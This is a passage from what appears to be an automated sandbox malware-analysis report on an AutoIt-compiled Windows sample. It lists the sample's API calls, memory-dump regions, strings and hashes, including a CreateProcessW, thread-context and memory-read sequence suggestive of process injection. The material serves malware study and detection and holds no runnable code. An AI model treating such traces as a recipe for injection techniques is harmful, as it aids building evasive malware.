                                                                              • Part of subcall function 0030C833: __wsplitpath.LIBCMT ref: 0030C93E
                                                                              • Part of subcall function 0030C833: _wcscpy.LIBCMT ref: 0030C953
                                                                              • Part of subcall function 0030C833: _wcscat.LIBCMT ref: 0030C968
                                                                              • Part of subcall function 0030C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0030C978
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                            • API String ID: 805182592-1757145024
                                                                            • Opcode ID: bef2cc0170e19cd9a813c6f238ed8f1b9d327b9a407d191ba8168971d115a1c5
                                                                            • Instruction ID: 1ac1f8e9791d9da07d4ac3f53c13ddd9cbe24a0beaa7dc49f372e722d05ee5b8
                                                                            • Opcode Fuzzy Hash: bef2cc0170e19cd9a813c6f238ed8f1b9d327b9a407d191ba8168971d115a1c5
                                                                            • Instruction Fuzzy Hash: 40917171910219AFCF16EFA4CC919EEB7B4FF19310F10842AF51AAF291DB34AA45DB50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00373725
                                                                            • GetOpenFileNameW.COMDLG32 ref: 0037376F
                                                                              • Part of subcall function 0030660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003053B1,?,?,003061FF,?,00000000,00000001,00000000), ref: 0030662F
                                                                              • Part of subcall function 003040A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003040C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                            • String ID: X$t3;
                                                                            • API String ID: 3777226403-4152952806
                                                                            • Opcode ID: 2b4bd5a912cbf9a6e348da62b6e4f103ff9b48880fca8050755ee65935b6ff27
                                                                            • Instruction ID: 8bd08dd5884aa7930faeed177b1dbfa2d2eb12154edcc40beb38591d749a6e12
                                                                            • Opcode Fuzzy Hash: 2b4bd5a912cbf9a6e348da62b6e4f103ff9b48880fca8050755ee65935b6ff27
                                                                            • Instruction Fuzzy Hash: AE21C3B1A002989BCB17DF94D815BDEBBFC9F49304F008059E505AB281DBB49A898F65
                                                                            APIs
                                                                            • __getstream.LIBCMT ref: 003234FE
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00323539
                                                                            • __wopenfile.LIBCMT ref: 00323549
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                            • String ID: <G
                                                                            • API String ID: 1820251861-2138716496
                                                                            • Opcode ID: 416e5bc6d68ee53e9716e2514b0752a14ea6e5676e8e838d3e3c4e103a1ec6d6
                                                                            • Instruction ID: d6fc932922e3032bf68b4c63148709528d45ed1765e470b6afd33dccd6c91359
                                                                            • Opcode Fuzzy Hash: 416e5bc6d68ee53e9716e2514b0752a14ea6e5676e8e838d3e3c4e103a1ec6d6
                                                                            • Instruction Fuzzy Hash: E3112C70A002369FDB13BF75BC4366E36A4AF06750B158965F819DF181EB38CA0197A1
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0031D28B,SwapMouseButtons,00000004,?), ref: 0031D2BC
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0031D28B,SwapMouseButtons,00000004,?,?,?,?,0031C865), ref: 0031D2DD
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,0031D28B,SwapMouseButtons,00000004,?,?,?,?,0031C865), ref: 0031D2FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: 469ec508731de507ea897b67fb4c791b8d6158dd2c04baa1b94a6adc2a2cc0e5
                                                                            • Instruction ID: cfadce46eb2beccf98d9baed02db7edfa6d26e7fa1beca732ac869e3a7130604
                                                                            • Opcode Fuzzy Hash: 469ec508731de507ea897b67fb4c791b8d6158dd2c04baa1b94a6adc2a2cc0e5
                                                                            • Instruction Fuzzy Hash: FD1179B9611208BFDB268FA4DC84EEF7BBCEF09740F104869E801D7150E731AE819B60
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4636D
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D46391
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D463B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                            • Instruction ID: 8ea42f9917415272364c3ab4c66e22f939ae325091bbe03f81f8155e4d155438
                                                                            • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                            • Instruction Fuzzy Hash: 44621F70A14658DBEB24CFA4C850BDEB371EF59300F1091A9E10DEB394E7759E81CB6A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 3877424927-0
                                                                            • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                            • Instruction ID: 86828a215d97cc2cf495c4e522b915e128cbf3614cc35f840644738a432a0869
                                                                            • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                            • Instruction Fuzzy Hash: 5B51E8B0A00325ABCF268F6DE88566E77A5AF40320F258729F8359B6D0D778DF548B40
                                                                            APIs
                                                                              • Part of subcall function 00304517: _fseek.LIBCMT ref: 0030452F
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C65D
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C670
                                                                            • _free.LIBCMT ref: 0034C4DD
                                                                            • _free.LIBCMT ref: 0034C4E4
                                                                            • _free.LIBCMT ref: 0034C54F
                                                                              • Part of subcall function 00321C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00327A85), ref: 00321CB1
                                                                              • Part of subcall function 00321C9D: GetLastError.KERNEL32(00000000,?,00327A85), ref: 00321CC3
                                                                            • _free.LIBCMT ref: 0034C557
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID:
                                                                            • API String ID: 1552873950-0
                                                                            • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                            • Instruction ID: ff639905d7b8f3e11cb53660c873bf520d7190f3ef77125f2adc6dd7deb90797
                                                                            • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                            • Instruction Fuzzy Hash: 20516FB1D05218AFDF559F65DC81BADBBB9EF48300F10009EF209AB291DB716A80CF58
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0034C72F
                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0034C746
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: 81a359252be91ae341fbd6c98985ad98a8ced283e19128af12da14d63abaf564
                                                                            • Instruction ID: 55d4bf8a0d6c5c2e96936341c0dff3a428c2d019466265f11447eeb5287ad85e
                                                                            • Opcode Fuzzy Hash: 81a359252be91ae341fbd6c98985ad98a8ced283e19128af12da14d63abaf564
                                                                            • Instruction Fuzzy Hash: E7D05E7150030EBBDB11AB90DC0EFCA776C9700708F0005A0B750A50F1DBB0E6998B54
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b4c45000b45e812105af0da1c79dd6e862a4565fa06a71becb9af813ce068cc
                                                                            • Instruction ID: d24542dbf52051378b3c6dd9609f573d2a8bb3394ba51215f825cdcf3a068749
                                                                            • Opcode Fuzzy Hash: 5b4c45000b45e812105af0da1c79dd6e862a4565fa06a71becb9af813ce068cc
                                                                            • Instruction Fuzzy Hash: 5CF16A716083019FC715DF24C881B6AB7E5BF88314F10896EF9959B2A2DB70E949CF82
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00305022
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003050CB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell__memset
                                                                            • String ID:
                                                                            • API String ID: 928536360-0
                                                                            • Opcode ID: 421d7b0118ef52bb480f767c05c9c9ec93adb15379d7021260c3c913289c15e4
                                                                            • Instruction ID: 6aba5a91c810207b125b5d944a801fa5747d7656332e1bf41afcb518a445a301
                                                                            • Opcode Fuzzy Hash: 421d7b0118ef52bb480f767c05c9c9ec93adb15379d7021260c3c913289c15e4
                                                                            • Instruction Fuzzy Hash: B4318DB1505701CFD722DF24D855A9BBBE8FF49308F00092EE69AC7281E771A948CF92
                                                                            APIs
                                                                            • __FF_MSGBANNER.LIBCMT ref: 00323973
                                                                              • Part of subcall function 003281C2: __NMSG_WRITE.LIBCMT ref: 003281E9
                                                                              • Part of subcall function 003281C2: __NMSG_WRITE.LIBCMT ref: 003281F3
                                                                            • __NMSG_WRITE.LIBCMT ref: 0032397A
                                                                              • Part of subcall function 0032821F: GetModuleFileNameW.KERNEL32(00000000,003C0312,00000104,00000000,00000001,00000000), ref: 003282B1
                                                                              • Part of subcall function 0032821F: ___crtMessageBoxW.LIBCMT ref: 0032835F
                                                                              • Part of subcall function 00321145: ___crtCorExitProcess.LIBCMT ref: 0032114B
                                                                              • Part of subcall function 00321145: ExitProcess.KERNEL32 ref: 00321154
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000000,?,?,0031F507,?,0000000E), ref: 0032399F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1372826849-0
                                                                            • Opcode ID: 59d70ab93b86e3c87189b73819d9059b19274c41a3fe0d2f27c0e85dcd013d77
                                                                            • Instruction ID: f021b98c98f60c623151995026b95a2ffec34bb15851886fec00c70e143d60a7
                                                                            • Opcode Fuzzy Hash: 59d70ab93b86e3c87189b73819d9059b19274c41a3fe0d2f27c0e85dcd013d77
                                                                            • Instruction Fuzzy Hash: DF0192312457319AE6273B35FC46B2A235C9B83760F220026F505DF592DBB8ED8086A0
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0034C385,?,?,?,?,?,00000004), ref: 0034C6F2
                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0034C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0034C708
                                                                            • CloseHandle.KERNEL32(00000000,?,0034C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0034C70F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 7c07df4dd22fed742d3a75b4e3fb1fc16acef8f5adb19cbc3e67513ac9a43b25
                                                                            • Instruction ID: 757347c7f608d5e7d71ba502264896bcba1ac9367c09f97de69aee627c295c38
                                                                            • Opcode Fuzzy Hash: 7c07df4dd22fed742d3a75b4e3fb1fc16acef8f5adb19cbc3e67513ac9a43b25
                                                                            • Instruction Fuzzy Hash: ACE08632141314BBDB622B54AC0EFCA7F5CAF05770F104150FB54690E097B129118798
                                                                            APIs
                                                                            • _free.LIBCMT ref: 0034BB72
                                                                              • Part of subcall function 00321C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00327A85), ref: 00321CB1
                                                                              • Part of subcall function 00321C9D: GetLastError.KERNEL32(00000000,?,00327A85), ref: 00321CC3
                                                                            • _free.LIBCMT ref: 0034BB83
                                                                            • _free.LIBCMT ref: 0034BB95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                            • Instruction ID: f122f369012615ae2a45cae9568e7d52dac455a57fde76e122af5a7017dbe970
                                                                            • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                            • Instruction Fuzzy Hash: F9E05BB574177147DA3565797F44EB363CC8F14351B15081DB459EF146CF24F84089B4
                                                                            APIs
                                                                              • Part of subcall function 003022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003024F1), ref: 00302303
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003025A1
                                                                            • CoInitialize.OLE32(00000000), ref: 00302618
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0037503A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 3815369404-0
                                                                            • Opcode ID: 4d6471c268e203145a952816c02505c1ec28d192721979cddae7269ce6f60c01
                                                                            • Instruction ID: 14e013c16f9557eb8a117c09e84371249d61abafdfc2f9a829c9559e833070f8
                                                                            • Opcode Fuzzy Hash: 4d6471c268e203145a952816c02505c1ec28d192721979cddae7269ce6f60c01
                                                                            • Instruction Fuzzy Hash: 0471A2B89012818AC307EF5AAD94D95BBACFB5B344F94492ED109CB6B3CB74A410EF54
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID: EA06
                                                                            • API String ID: 2638373210-3962188686
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 00303A73
                                                                              • Part of subcall function 00321405: __lock.LIBCMT ref: 0032140B
                                                                              • Part of subcall function 00303ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00303AF3
                                                                              • Part of subcall function 00303ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00303B08
                                                                              • Part of subcall function 00303D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00303AA3,?), ref: 00303D45
                                                                              • Part of subcall function 00303D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00303AA3,?), ref: 00303D57
                                                                              • Part of subcall function 00303D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,003C1148,003C1130,?,?,?,?,00303AA3,?), ref: 00303DC8
                                                                              • Part of subcall function 00303D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00303AA3,?), ref: 00303E48
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00303AB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                            • String ID:
                                                                            • API String ID: 924797094-0
                                                                            APIs
                                                                            • ___lock_fhandle.LIBCMT ref: 0032EA29
                                                                            • __close_nolock.LIBCMT ref: 0032EA42
                                                                              • Part of subcall function 00327BDA: __getptd_noexit.LIBCMT ref: 00327BDA
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                            • String ID:
                                                                            • API String ID: 1046115767-0
                                                                            APIs
                                                                              • Part of subcall function 0032395C: __FF_MSGBANNER.LIBCMT ref: 00323973
                                                                              • Part of subcall function 0032395C: __NMSG_WRITE.LIBCMT ref: 0032397A
